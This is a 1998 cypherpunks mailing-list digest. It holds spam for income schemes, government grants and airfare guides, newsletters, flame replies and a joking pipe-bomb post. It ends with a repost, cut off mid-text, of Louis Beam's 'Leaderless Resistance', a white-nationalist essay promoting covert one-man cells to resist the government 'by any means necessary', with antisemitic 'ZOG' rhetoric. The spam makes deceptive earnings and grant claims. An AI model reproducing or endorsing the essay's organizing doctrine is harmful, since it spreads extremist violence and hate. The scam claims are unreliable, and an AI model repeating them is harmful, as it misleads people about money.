     Do you want to end your money pressures forever?
     Do you want to double your income?
     Do you want to build an extra stream of income quickly?

If you answered yes, then let me show you how you can begin living your 
dreams, this year before it's too late.  I'll get right to the point.

As it says on the letterhead, my name is Robert Allen.  I'm famous for 
My two #1 New York Times best-selling books.  Nothing Down and Creating 
Wealth in America.  There are lots of millionaires who credit their 
success to one of my books or seminars.  So when I share this secret 
with you, I want you to know that I've done my homework.  Here it comes.

I have discovered what I believe is the perfect home-based business.

Although I'm well known for real-estate investment books and seminars, 
this new business has absolutely nothing to do with real-estate. In fact,
it's much easier and far less risky.  

It involves:

-No employees
-Little risk
-Little start up cash
-It's so simple, anyone can do it

You could be earning $1,000 a week in as little as 90 days.  One person I 
know went from zero to $3,000 a week in 60 days.  That's $150,000 a year 
extra, hassle-free income!

In my 20 years of research, I can honestly say, "I've never seen a faster,
easier way to create a stream of income".

I know this sounds too good to be true.  Frankly, I didn't believe it 
myself at first.  Finally, I agreed to check it out.  As a test, I 
selected a small group of people and introduced them to this incredible
opportunity.  Almost immediately, many of them started earning profits.  
Within a week, many were earning incomes of $4,000 per month in net cash 
flow.  Now, some of them are cashing checks for $3,000 a week.  And this 
is just the beginning!  Their earning potential could be unlimited!

Would you like to learn how to do that?  I'd love to show you how.  But 
only if you're interested enough to make one telephone call.  The number 
to call immediately is 1-888-310-6470.  It's a 3-minute, 24-hour recorded 
message.  This may be the answer you have been seeking.

Warmly,

Robert G. Allen

P.S.  I want to show you how to create extra streams of income quickly,
      Go to the phone and call now 1-888-310-6470.


// 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ILovToHack@aol.com
Date: Thu, 23 Jul 1998 19:11:10 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Pipe bombs r better
Message-ID: <285f3dfa.35b7ec4c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain

In a message dated 7/23/98 10:05:06 PM Eastern Daylight Time, ILovToHack
writes:

<< << > they rule!
  
  In your ass, that is...
   >>
 pipe bombs rule how ever puting them there could be hazardous to your health
    #
   *i* 
 __!__
 I       I  Mr pipe bomb 
 I       I
 I       I
 l_ _ _l 



To: chrisharwig@hetnet.nl
Subject: Re: Pipe bombs r better
From: ILovToHack@aol.com
Date: Thu, 23 Jul 1998 22:05:06 EDT


<< > they rule!
 
 In your ass, that is...
  >>
pipe bombs rule how ever puting them there could be hazardous to your health
   #
  *i* 
__!__
I       I  Mr pipe bomb 
I       I
I       I
l_ _ _l




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Frantz <frantz@netcom.com>
Date: Thu, 23 Jul 1998 23:31:53 -0700 (PDT)
To: "William H. Geiger III" <yjia@sz.utl.com.hk>
Subject: Re: where...
In-Reply-To: <19980721071954.AAA9474@pc-230>
Message-ID: <v03110737b1dde1b3127f@[209.109.235.248]>
MIME-Version: 1.0
Content-Type: text/plain


At 2:28 AM -0800 7/21/98, William H. Geiger III wrote:
>The Specs are at: http://www.itu.ch/publications/itu-t/itut.htm
>
>The X.400 specs are actually located under F.400 as this spec has been
>givien a dual designation of F.400/X.400
>
>Seems that you have to *pay* for a copy of this spec, 39 Swiss Francs,
>whatever that is in real money.
>
>X.500 is the same deal but it is only 20 Swiss Francs.

Those prices are a lot better than the last X.25 spec I priced.  My local
paper says that 1 Swiss Franc is worth about 66 US cents ($0.66).  That is
about the same exchange rate as when I was in Switzerland last summer.  As
one of the world's more stable currencies, I would indeed consider the
Swiss Franc to be "real money".


-------------------------------------------------------------------------
Bill Frantz       | If hate must be my prison  | Periwinkle -- Consulting
(408)356-8506     | lock, then love must be    | 16345 Englewood Ave.
frantz@netcom.com | the key.     - Phil Ochs   | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Thu, 23 Jul 1998 20:49:11 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Exclusive: Sex & drugs in a tropical paradise/Russians paid in dildos
Message-ID: <19980724020226.17637.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/7/23/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "LiveUpdate News" <update@annex.liveupdate.com>
Date: Fri, 24 Jul 1998 01:15:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Crescendo News - July 1998
Message-ID: <00bec2615081878ANNEX@annex.liveupdate.com>
MIME-Version: 1.0
Content-Type: text/plain


CRESCENDO NEWS - July 1998

Hello from the editors of the July 1998 edition of the LiveUpdate 
Crescendo Newsletter.  You're receiving this email because you 
downloaded Crescendo in the past, and we want to keep you up to date with
some of the exciting things that are happening at LiveUpdate.  
We hope you are enjoying Crescendo!

These are some of the items included in this newsletter:

* LiveUpdate launches real-time "SoundChat" chat service
* Crescendo version 3.0 appears on Netscape's SmartUpdate site
* Using Crescendo and Crescendo PLUS version 3.0 with Windows 98
* What is streaming MIDI, and why would I want it?
* What would you like to see in future versions of Crescendo?
* Subscribing / Unsubscribing

----------------------------------

LIVEUPDATE LAUNCHES REAL-TIME "SOUNDCHAT" SERVICE

On July 21st, LiveUpdate opened the "SoundChat" General Discussion
real-time chat Forum.  This is the first of many free chat areas which
LiveUpdate is providing to allow you to chat in real time with fellow 
Crescendo users around the world.  Over time, we will be opening new 
rooms for surfers, webmasters, and musicians to congregate and discuss 
specific issues relating to player installation, adding music to your 
web site, MIDI file creation, and much more.  We will also be hosting 
live events where you will be able to chat with world-class experts 
on these various topics.

As an added bonus, chatters are now being given early access to our 
newest technology, Crescendo Forte.  To sign up and start chatting, 
point your web browser to http://soundchat.com/chat.

----------------------------------

CRESCENDO VERSION 3.0 APPEARS ON NETSCAPE'S SMARTUPDATE SITE

We are proud to announce that Netscape has chosen Crescendo as one
of the few elite add-on components for inclusion in the new SmartUpdate
area of the Netscape site.  SmartUpdate is a free service that allows
you to automatically download and install the latest versions of 
Navigator add-on components, now including Crescendo.  The latest full 
versions of Crescendo and Crescendo PLUS will continue to be available 
from the LiveUpdate site at http://www.liveupdate.com/dl.html.

----------------------------------

WHAT IS STREAMING MIDI, AND WHY WOULD I WANT IT?

"Streaming" is the ability to listen to music while it is being sent to 
you over the Internet.  In much the same way that web images fill in as 
they are downloading, our patent-pending streaming MIDI technology 
starts playing and "fills in" the music as it downloads, allowing you to 
hear the music long before the entire MIDI file has finished downloading.
In most cases, streaming MIDI music will start to play almost immediately.

Crescendo PLUS is the only MIDI player available in the world that will 
stream all types of MIDI files from any Internet source.  Crescendo PLUS
is available for immediate purchase ($19.95) and download at the LiveUpdate 
on-line store (https://secure.liveupdate.com).

If you are a web site author, and you would like to add streaming MIDI
to your web site, we offer a product called "Crescendo StreamSite" which
consists of a key for your web server that unlocks the streaming
feature which is included in the free versions of Crescendo.  The StreamSite
key is completely compatible with all web servers, and doesn't require
any intervention from your service provider.  Installation of the StreamSite
key involves uploading a single binary file to your web site, and can
be easily completed in less than 5 minutes.  Personal StreamSite keys
are available for immediate purchase ($49.95) and download at the LiveUpdate 
on-line store.

You can experience streaming MIDI without purchasing anything at all.
Just download the latest version of the free Crescendo player and 
visit the Crescendo StreamSites listed at 
http://www.liveupdate.com/streamsites.html.  These sites have all purchased 
StreamSite keys so that you can enjoy streaming MIDI as you visit their 
sites.

----------------------------------

USING CRESCENDO AND CRESCENDO PLUS VERSION 3.0 WITH WINDOWS 98

To the best of our knowledge, Crescendo and Crescendo PLUS are completely 
compatible with Windows 98.  If Crescendo has worked for you in the but 
you are having trouble after installing Windows 98, we have found that 
re-installing Crescendo will most likely solve any problems you may be
experiencing.  If you still see problems after re-installing, send a 
message to helpdesk@liveupdate.com and we will try to help.

----------------------------------

WHAT WOULD YOU LIKE TO SEE IN FUTURE VERSIONS OF CRESCENDO?

We are constantly looking for new ideas to be included in future
versions of the Crescendo player.  If you have any cool ideas of
things you would like to see added to Crescendo, send them to
feedback@liveupdate.com.  Who knows - maybe your suggestion will
makes its way into the next version of Crescendo!

----------------------------------

SUBSCRIBING / UNSUBSCRIBING

Note: Messages from LiveUpdate to this list will not be sent any more
frequently than once a month, and your information has not and will not 
be given to others or sold.  If you wish to unsubscribe from this list, 
or if this message has been forwarded to you by a friend and you would
like to subscribe to our newsletter, please send a message to 
newsletter@liveupdate.com.

*******************************************

Spread the Music!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 23 Jul 1998 23:05:22 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Todd Bowers: Dumbass
Message-ID: <199807240605.IAA00062@replay.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Jul 1998, Todd Bowers wrote:

> 
> cool ..... i am 13
> 
> 

Actually, your being a complete dumbass overshadows your being 13.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gvtgrantz@sprintmail.com
Date: Thu, 23 Jul 1998 18:09:56 -0700 (PDT)
To: Gvtgrantz@sprintmail.com
Subject: Free Government Grants
Message-ID: <199807232351.IAA13191@JingXian.xmu.edu.cn>
MIME-Version: 1.0
Content-Type: text/plain


The US Government sets aside Billions of dollars each year in
the form  of grants and loans for entrepreneurs and the American
public. Your tax  dollars are not all spent by the Defense Department.
A large percentage  of your tax dollars are set up for domestic
assistance to help individuals, entrepreneurs and businesses create 
jobs whether the company is large or small. Steven Jobs received 
government help with his company Apple Computers, Donald Trump,
Ross Perot , Lee Iaccoca are just to name  a few of the individuals
who used this program to start billion dollar  corporations.
Each year the government gives out hundreds of millions of dollars
to  companies,individuals and entrepreneurs, homemakers and the likes.
Currently, less than 2% of the population applies for grants and 
loans  while a large percentage around 4 Billion remains unclaimed
when it  could help an entrepreneur, company or someone in need. 
Most Americans  do not know these programs exist for their benefit.
The government wants  you to succeed in hopes of stimulating the 
economy. Take a look at some  of the programs available.
Direct Grants to $800,000 Direct Loans to $2,200,000. Over 300 grants 
for business and loans that are easier to obtain than conventional 
loans. All grants and some loans require no credit check and no  
collateral because you are actually borrowing your tax dollars set
aside  for business start-up and development. You live in the 
greatest country  in the world "Only in America" You hear the term 
spoken but without  comprehension. More immigrants call for assistance
than US citizen,s  they see the opportunity and if not first successful
they try back when  they become citizen,s. Are they successful? 
Eventually.
The government means business ,to help you they have hired over 
1500  professionals to help you if only you would call. The area
of expertise  falls under marketing, consultation,import,export
and anything  pertaining to business that might help you succeed.
This could mean the  difference in success or failure of your 
business. The business endeavor  does not matter the government 
has the money and an expert to help you  whether you are in farming,
real estate, retail,daycare or any legal  money making opportunity.

If you are a tax paying citizen you owe it to yourself to take a 
look at  these programs immediately.
Just for ordering, you will receive: 
1."How to Write a Business Plan" approved by the Chamber of Commerce,
2.The HUD Home Ownership Program ( Guarantee you will qualify for at 
least 5)
3.Government Auctions,
4.Education Grants
5.Free Credit Repair
6.Bad Credit Loans-Categories A,B,C and D
7.and lots of other freebies from the government

All applications, SBA forms, All legal forms for business start-up are 
included.Organizations and Schools-Quantities of 10 or more deduct 15%
To order by mail send check or money order for $19.95 plus $3.00 
shipping and handling to:

Government Publications
2120 L. St NW ste 210
Washington DC 20037

Info: (202) 298- 9673

-------------------------Cut Here---------------------------
Yes, I want to purchase your guide to government grants and loans 
for $19.95 plus $3.00 S&H (US Dollars). 30 day money back guarantee. 
All money orders shipped in 3 days.

I've enclosed my:
_____ Check _____Money Order _____Credit Card Information

If paying by credit card:
Please Circle: VISA or MasterCard or American Express

  Account #:
             __________ - __________ - __________ - __________
  Exp. Date:
             ______________________
  Signature:
             _____________________________________________
  Today's
  Date:
             ______________________


Your Mailing Address:

  Name: 
             ________________________________________
  Address: 
             ________________________________________
  City: 
             ________________________________________
  State: 
             ________________________________________
  Zip: 
             ________________________________________
  E-mail: 
             ________________________________________


Mail to: 
Government Publications ; 2120 L. St NW ste 210 ; Washington DC 20037













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Cummings <0_rcummi@funrsc.fairfield.edu>
Date: Fri, 24 Jul 1998 07:45:40 -0700 (PDT)
To: Skoitch@aol.com
Subject: Re: W.A.Y.
In-Reply-To: <b9ebd885.35b762f7@aol.com>
Message-ID: <Pine.ULT.3.95.980724104930.3180D-100000@funrsc.fairfield.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Jul 1998 Skoitch@aol.com wrote:

> 
> WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?   
> 
> 

Reason 1:  You're from AOL
Reason 2:  You don't know where the caps lock key is
Reason 3:  You're looking on the cypherpunks list for music.
Reason 4:  You're from AOL





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Fri, 24 Jul 1998 10:31:59 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - July 24, 1998
Message-ID: <199807241706.MAA19229@revnet2.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

A new multi-billion dollar industry is here! 
Be at CTIA's WIRELESS I.T. '98
where personal computing and communications converge!

Don't Miss Your Chance -- October 12-14, 1998
Bally's Las Vegas, Las Vegas, NV

For more information, visit http://www.wirelessit.com 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wioca62@galaxylink.com.hk (jumiel)
Date: Fri, 24 Jul 1998 06:53:01 -0700 (PDT)
To: wioca62@galaxylink.com.hk
Subject: stop paying those inflated airfare prices
Message-ID: <199807241044SAA15312@humkoipoio.hujk.saar.de>
MIME-Version: 1.0
Content-Type: text/plain



USA Today has reported that business fares rose approximately 20%
in 1998. This is on top of a 15% gain from 1997.
EXCURSION OR VACATION FARES CANNOT BE FAR BEHIND.

Many people believe that they can find the cheapest airfares by 
surfing through the many on-line reservation systems available on the
Internet. DON'T BE FOOLED These reservation systems are owned,
operated and maintained by the airlines themselves and are often slow
to be updated. They also don't include many of the deeply discounted
fare programs offered by the airlines.

How often have you called the Airlines or your local Travel Agent and
asked them to give you their cheapest fare, only to find that the
person sitting next to you has gotten his seat for much less. "The
Insider's Guide to Cheaper Airfares" will introduce you to other
ticketing alternatives and strategies that the Major Airlines don't
want you to know. These sources offer deeply discounted seats that
are on the same flights that airlines are charging other passengers
twice as much. Among the Things this valuable book will show you are:


*** How to get Airlines to notify you about discounts
    BEFORE they go public.

*** Ticket strategies Airlines don't want you to know.

*** How to save at least 50% on International Travel.

*** Which reservation systems work best with which Hubs and Airlines.

*** How to get domestic tickets for 40% to 60% off.

Whether your goal is to go on that vacation of a lifetime or to
bring a loved one home to the family, "The Insider's Guide to
CheaperAirfares" will show you that reasonable airfares from anywhere
in the country are easily and affordably within your reach. Why give
all of your hard earned money to the airlines when you can spend that
money on fun once you arrive?

Our Book normally sells for $12.95 plus $2.00 for shipping and
handling. But if  you order by August 31, 1998 you will pay only
$9.95 and we'll pay for shipping. That is a $5.00 savings.

Send $9.95 (cash, check, or money order)

Make Check Payable To:

Travel Guide$
16787 Beach Blvd. Suite #225
Huntington Beach, CA 92647


DON'T DELAY, SAVE ON YOUR NEXT TRIP TODAY


=================Please Complete==================

Yes Travel Guide$, I wish to take you up on your Special Offer, 
Please rush me "The Insider's Guide to Cheaper Airfares" today. I
have filled out this form for you to help expedite my order.


Name: 

Address:

City:

State: Zip:

E-mail Address:
(for order confirmation)

Send Your Order for $9.95

Travel Guide$
16787 Beach Blvd Suite#225
Huntington Beach, Ca 92647


^^^^^^^
gend




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 24 Jul 1998 15:49:03 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is that real?
Message-ID: <009C9AA3.421B6260.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


X-URL: mailto:cypherpunks@toad.com
X-Mailer: Lynx, Version 2-4-2
X-Personal_name: Linda Reeza
X-From: obvious@forgery.eff

Reeza,
  Stop hacking those military computer accounts, and quit backtalking
to your teacher, or you'll never get out of grade 4...

  Yes, the passage of SAHMD, regarding putting electronic probes into the
brains of children and other monkeys was Real (TM), as is almost every 
other 'example' used in the True Story manuscripts, although there is
often small 'liberties' taken with the details, names, etc., for reasons
of protecting someone's ass (usually mind) for disseminating classified
material without proper authorization from an officially recognized law-
breaker/news-leaker, or just because I'm drunk.
  It is often left as an ExerciseForTheReader, if they are interested, to
do a websearch, or whatever, and see if they can uncover such details as,
say, a person who might be named, lets say, for the sake of argument...
E.B. Montgomery, who was engaged in giving MonkeyBrains direct electronic
subscriptions to Wired Magazine, and who recently moved to Chicago, to
continue his work on a new level.

Linda Lou Reeza
{The *real* owner of the military account that the little grade 4
 troublemaker is hacking and posting through, as well as forging
 chapters of SAHMD under the alias, LREED.}





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 24 Jul 1998 16:16:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: mailto:cypherpunks@toad.com
Message-ID: <009C9AA7.2778B3A0.8@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


X-URL: mailto:cypherpunks@toad.com
X-Mailer: Lynx, Version 2-4-2
X-Personal_name: Dog Day Afternoont






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Iain Collins" <icollins@scotland.net>
Date: Fri, 24 Jul 1998 09:05:18 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: RE: W.A.Y.
In-Reply-To: <b9ebd885.35b762f7@aol.com>
Message-ID: <000d01bdb71c$6c3dd200$c7f3b094@webadmin.sol.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>
> WHY CANT I FIND ANY WHITE AMERICAN YOUTH ALBUMS ANYWHERE?
>

Try tidying up!
Try asking your brother if be 'borrowed' them all!
Try looking in a record store!

<LART><LART><LART>

Iain, <icollins@sol.co.uk>

PS: I'd like to ask how on earth so many people manage to subscribe to this
list, solely in order to churn out stuff like this? How do they manage to
use the e-mail software to actually send a message to this group? How do
they remember to breathe? AGH!!!!!!!!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Fri, 24 Jul 1998 19:53:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A Thousand Points Of Fight
Message-ID: <009C9AC5.59A235E0.9@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain



   Breakthrough Texts 
   Leaderless Resistance
   An Essay by Louis Beam
   
     
     
     "Leaderless Resistance" -- Part One
     
     [IMAGE] The concept of leaderless resistance was proposed by Col.
     Ulius Louis Amoss, who was the founder of International Service of
     Information Incorporated, located in Baltimore, Maryland. Col. Amoss
     died more than 15 years ago, but during his life he was a tireless
     opponent of Communism, as well as a skilled intelligence officer.
     [INLINE] Col. Amoss first wrote of leaderless resistance on April
     17, 1962. His theories of organization were primarily directed
     against the threat of eventual Communist takeover in the United
     States. The present writer, with the benefit of having lived many
     years beyond Col. Amoss, has taken his theories and expounded on
     them.
     [INLINE] Col. Amoss feared the Communists. This author fears the
     federal government. Communism now represents a threat to no one in
     the United States, while federal tyranny represents a threat to
     EVERYONE. The writer has joyfully lived long enough to see the dying
     breaths of Communism, but may unhappily remain long enough to see
     the last dying gasps of freedom in America.
     [INLINE] In the hope that, somehow, America can still produce the
     brave sons and daughters necessary to fight off ever-increasing
     persecution and oppression, this essay is offered. Frankly, it is
     too close to call at this point. Those who love liberty, and believe
     in freedom enough to fight for it, are rare today; but within the
     bosom of every once great nation, there remains secreted the pearls
     of former greatness.
     [INLINE] They are there. I have looked into their sparkling eyes;
     sharing a brief moment in time with them as I passed through this
     life. Relished their friendship, endured their pain, and they mine.
     We are a band of brothers native to the soil, gaining strength one
     from another as we have rushed headlong into battle that all the
     weaker, timid men say we can not win. Perhaps not... but then again,
     perhaps we can. It's not over till the last freedom fighter is
     buried or imprisoned, or the same happens to those who would destroy
     their liberty.
     [INLINE] Barring any cataclysmic events, the struggle will yet go on
     for years. The passage of time will make it clear to even the more
     slow among us that the government is the foremost threat to the life
     and liberty of the folk. The government will no doubt make today's
     oppressiveness look like grade school work compared to what they
     have planned in the future. Meanwhile, there are those of us who
     continue to hope that somehow the few can do what the many have not.
     [INLINE] We are cognizant that before things get better they will
     certainly get worse as government shows a willingness to use ever
     more severe police state measures against dissidents. This changing
     situation makes it clear that those who oppose state repression must
     be prepared to alter, adapt, and modify their behavior, strategy,
     and tactics as circumstances warrant. Failure to consider new
     methods and implement them as necessary will make the government's
     efforts at suppression uncomplicated. It is the duty of every
     patriot to make the tyrant's life miserable. When one fails to do so
     he not only fails himself, but his people.
     [INLINE] With this in mind, current methods of resistance to tyranny
     employed by those who love our race, culture, and heritage must pass
     a litmus test of soundness. Methods must be objectively measured as
     to their effectiveness, as well as to whether they make the
     government's intention of repression more possible or more
     difficult. Those not working to aid our objectives must be
     discarded, or the government benefits from our failure to do so.
     [INLINE] As honest men who have banded together into groups or
     associations of a political or religious nature are falsely labeled
     "domestic terrorists" or "cultists" and suppressed, it will become
     necessary to consider other methods of organization, or as the case
     may very well call for: non- organization.
     [INLINE] One should keep in mind that it is not in the government's
     interest to eliminate all groups. Some few must remain in order to
     perpetuate the smoke and mirrors for the masses that America is a
     "free democratic country" where dissent is allowed. Most
     organizations, however, that possess the potential for effective
     resistance will not be allowed to continue. Anyone who is so naive
     as to believe the most powerful government on earth will not crush
     any who pose a real threat to that power, should not be active, but
     rather at home studying political history.
     [INLINE] The question as to who is to be left alone and who is not,
     will be answered by how groups and individuals deal with several
     factors such as: avoidance of conspiracy plots, rejection of
     feebleminded malcontents, insistence upon quality of the
     participants, avoidance of all contact with the front men for the
     federals - the news media - and, finally, camouflage (which can be
     defined as the ability to blend in the public's eye the more
     committed groups of resistance with mainstream "kosher" associations
     that are generally seen as harmless).
     [INLINE] Primarily though, whether any organization is allowed to
     continue in the future will be a matter of how big a threat a group
     represents. Not a threat in terms of armed might or political
     ability, for there is none of either for the present, but rather,
     threat in terms of potentiality. It is potential the federals fear
     most. Whether that potential exists in an individual or group is
     incidental. The federals measure potential threat in terms of what
     might happen given a situation conducive to action on the part of a
     resistive organization or individual. Accurate intelligence
     gathering allows them to assess the potential. Showing one's hand
     before the bets are made is a sure way to lose.
     [INLINE] The movement for freedom is rapidly approaching the point
     where, for many people, the option of belonging to a group will be
     non-existent. For others, group membership will be a viable option
     for only the immediate future. Eventually, and perhaps much sooner
     than most believe possible, the price paid for membership will
     exceed any perceived benefit. But for now, some of the groups that
     do exist often serve a useful purpose either for the newcomer who
     can be indoctrinated into the ideology of the struggle, or for
     generating positive propaganda to reach potential freedom fighters.
     It is sure that, for the most part, this struggle is rapidly
     becoming a matter of individual action, each of its participants
     making a private decision in the quietness of his heart to resist:
     to resist by any means necessary.
     [INLINE] It is hard to know what others will do, for no man truly
     knows another man's heart. It is enough to know what one himself
     will do. A great teacher once said "know thyself." Few men really
     do, but let each of us promise ourselves not to go quietly to the
     fate our would-be masters have planned.
     [INLINE] The concept of leaderless resistance is nothing less than a
     fundamental departure in theories of organization. The orthodox
     scheme of organization is diagrammatically represented by the
     pyramid, with the mass at the bottom and the leader at the top. This
     fundamental of organization is to be seen not only in armies, which
     are, of course, the best illustration of the pyramid structure, with
     the mass of soldiery (the privates) at the bottom responsible to
     corporals; who are in turn responsible to sergeants, and so on up
     the entire chain of command to the generals at the top. But the same
     structure is seen in corporations, ladies' garden clubs, and in our
     political system itself. This orthodox "pyramid" scheme of
     organization is to be seen basically in all existing political,
     social, and religious structures in the world today, from the
     Federal government to the Roman Catholic Church.
     [INLINE] The Constitution of the United States, in the wisdom of the
     Founders, tried to sublimate the essential dictatorial nature
     pyramidal organization by dividing authority into three: executive,
     legislative, and judicial. But the pyramid remains essentially
     untouched.
     [INLINE] This scheme of organization, the pyramid, is not only
     useless, but extremely dangerous for the participants when it is
     utilized in a resistance movement against state tyranny. Especially
     is this so in technologically advanced societies where electronic
     surveillance can often penetrate the structure, thus revealing its
     chain of command. Experience has revealed over and over again that
     anti-state political organizations utilizing this method of command
     and control are easy prey for government infiltration, entrapment,
     and destruction of the personnel involved. This has been seen
     repeatedly in the United States where pro-government infiltrators or
     agent provocateurs weasel their way into patriotic groups and
     destroy them from within.
     [INLINE] In the pyramid form of organization, an infiltrator can
     destroy anything which is beneath his level of infiltration, and
     often those above him as well. If the traitor has infiltrated at the
     top, then the entire organization from the top down is compromised
     and may be traduced at will.
     
     
     "Leaderless Resistance" -- Part Two
     
     [IMAGE] A recent example of the cell system taken from the left wing
     of politics are the Communists. The Communists, in order to get
     around the obvious problems involved in pyramidal organization,
     developed to an art the cell system. They had numerous independent
     cells which operated completely isolated from one another and
     particularly with no knowledge of each other, but were orchestrated
     together by a central headquarters. For instance, during WWII, in
     Washington, it is known that there were at least six secret
     Communist cells operating at high levels in the United States
     government (plus all the open Communists who were protected and
     promoted by President Roosevelt), however, only one of the cells was
     rooted out and destroyed. How many more actually were operating, no
     one can say for sure.
     [INLINE] The Communist cells which operated in the U.S. until late
     1991 under Soviet control could have at their command a leader who
     held a social position which appeared to be very lowly. He could be,
     for example, a busboy in a restaurant, but in reality a colonel or a
     general in the Soviet Secret Service, the KGB. Under him could be a
     number of cells, and a person active in one cell would almost never
     have knowledge of individuals who were active in other cells; in
     fact, the members of the other cells would be supporting that cell
     which was under attack and ordinarily would lend very strong support
     to it in many ways. This is at least part of the reason, no doubt,
     that whenever in the past Communists were attacked in this country,
     support for them sprang up in many unexpected places.
     [INLINE] The effective and efficient operation of a cell system
     after the Communist model is, of course, dependent upon central
     direction, which means impressive organization, funding from the
     top, and outside support, all of which the Communists had.
     Obviously, American patriots have none of these things at the top or
     anywhere else, and so an effective cell organization based upon the
     Soviet system of operation is impossible.
     [INLINE] Two things become clear from the above discussion. First,
     that the pyramid form of organization can be penetrated quite easily
     and it thus is not a sound method of organization in situations
     where the government has the resources and desire to penetrate the
     structure, which is the situation in this country. Secondly, that
     the normal qualifications for the cell structure based upon the Red
     model does not exist in the U.S. for patriots. This understood, the
     question arises "What method is left for those resisting state
     tyranny?"
     [INLINE] The answer comes from Col. Amoss who proposed the "Phantom
     Cell" mode of organization which he described as Leaderless
     Resistance. A system of organization that is based upon the cell
     organization, but does not have any central control or direction,
     that is in fact almost identical to the methods used by the
     committees of correspondence during the American Revolution.
     Utilizing the Leaderless Resistance concept, all individuals and
     groups operate independently of each other, and never report to a
     central headquarters or single leader for direction or instruction,
     as would those who belong to a typical pyramid organization.
     [INLINE] At first glance, such a form of organization seems
     unrealistic, primarily because there appears to be no organization.
     The natural question thus arises as to how are the "Phantom Cells"
     and individuals to cooperate with each other when there is no
     inter-communication or central direction?
     [INLINE] The answer to this question is that participants in a
     program of leaderless resistance through "Phantom Cell" or
     individual action must know exactly what they are doing and how to
     do it. It becomes the responsibility of the individual to acquire
     the necessary skills and information as to what is to be done. This
     is by no means as impractical as it appears, because it is certainly
     true that in any movement all persons involved have the same general
     outlook, are acquainted with the same philosophy, and generally
     react to given situations in similar ways. The previous history of
     the committees of correspondence during the American Revolution
     shows this to be true.
     [INLINE] Since the entire purpose of leaderless resistance is to
     defeat state tyranny (at least in so far as this essay is
     concerned), all members of phantom cells or individuals will tend to
     react to objective events in the same way through usual tactics of
     resistance. Organs of information distribution such as newspapers,
     leaflets, computers, etc., which are widely available to all, keep
     each person informed of events, allowing for a planned response that
     will take many variations. No one need issue an order to anyone.
     Those idealists truly committed to the cause of freedom will act
     when they feel the time is ripe, or will take their cue from others
     who precede them. While it is true that much could be said against
     this kind of structure as a method of resistance, it must be kept in
     mind that leaderless resistance is a child of necessity. The
     alternatives to it have been shown to be unworkable or impractical.
     Leaderless resistance has worked before in the American Revolution,
     and if the truly committed put it to use themselves, it will work
     now.
     [INLINE] It goes almost without saying that Leaderless Resistance
     leads to very small or even one-man cells of resistance. Those who
     join organizations to play "let's pretend" or who are "groupies"
     will quickly be weeded out. While for those who are serious about
     their opposition to federal despotism, this is exactly what is
     desired.
     [INLINE] From the point of view of tyrants and would-be potentates
     in the federal bureaucracy and police agencies, nothing is more
     desirable than that those who oppose them be UNIFIED in their
     command structure, and that EVERY person who opposes them belong to
     a pyramid style group. Such groups and organizations are easy to
     kill. Especially in light of the fact that the Justice (sic)
     Department promised in 1987 that there would never be another group
     to oppose them that they did not have at least one informer in!
     These federal "friends of government" are ZOG or ADL intelligence
     agents. They gather information that can be used at the whim of a
     federal D.A. to prosecute. The line of battle has been drawn.
     [INLINE] Patriots are REQUIRED, therefore, to make a conscious
     decision to either aid the government in its illegal spying (by
     continuing with old methods of organization and resistance), or to
     make the enemy's job more difficult by implementing effective
     countermeasures.
     [INLINE] Now there will, no doubt, be mentally handicapped people
     out there who will state emphatically in their best red, white, and
     blue voice, while standing at a podium with an American flag draped
     in the background and a lone eagle soaring in the sky above, that,
     "So what if the government is spying? We are not violating any
     laws." Such crippled thinking by any serious person is the best
